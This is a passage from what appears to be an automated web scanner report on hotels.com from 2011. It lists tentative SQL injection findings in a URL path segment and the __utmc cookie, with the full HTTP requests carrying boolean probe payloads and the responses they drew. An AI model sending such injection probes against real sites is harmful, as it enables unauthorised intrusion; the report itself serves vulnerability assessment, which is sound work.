Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:32 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...
1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html'%20and%201%3d1--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43425
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

Request 2

GET /hotel/details.html'%20and%201%3d2--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43617
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...
1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:48 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
